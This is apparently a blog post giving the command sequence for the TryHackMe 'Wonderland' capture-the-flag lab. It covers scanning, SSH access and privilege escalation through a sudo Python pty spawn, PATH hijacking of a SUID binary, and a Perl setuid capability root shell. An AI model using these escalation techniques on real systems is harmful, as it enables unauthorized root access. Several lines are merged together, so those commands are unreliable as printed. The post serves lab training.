TryHackMe: Wonderland

  1. Port scan
nmap -Pn <ip>
nmap -A -p 22,80 <ip>
nmap --script vuln -p 22,80 <ip>
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,sh,cgi
ssh alice@<ip>
ls -la
cat root.txt
sudo -l
echo 'import pty;pty.spawn("/bin/bash");' > random.py
cat random.py
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
sudo -l
cd /home/rabbit/ls -la
find / -perm -u=s -type f 2>/dev/null
./teaParty
strings teaParty
strace -v -f -e execve /home/rabbit/teaParty 2>&1 | grep exec
cd /tmpecho /bin/sh > datechmod 777 dateexport PATH=/tmp:$PATH
cd /home/rabbit./teaPartywhoami
cd /home/hatter/ls -la
cat password.txt
ssh hatter@<ip>
sudo -l
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
cd /home/alicecat root.txt
cd /rootls -lacat user.txt

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How I wrote 10, 000 lines of code in just a month, from a different background.

The Best IDE’s / Editors For Golang In 2022

Weekly Tech Report

Why No Self-Respecting Project Can Skip Code Review

Know how Git works: Behind the Scenes!

Creating a record of node mutation events using GraphQL Connections

API Gateway in Microservices

Intermediate: Integration of Huawei Mobile Services Multi kit (Account, Analytics, Ads, Location…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ratiros01

ratiros01

OSCP

More from Medium

Splunk: top & rare Command

3 Machine lab — 2. ASM for Active directory

TryHackMe Holo — Recon

HTB Chase [easy] Forensics Challenge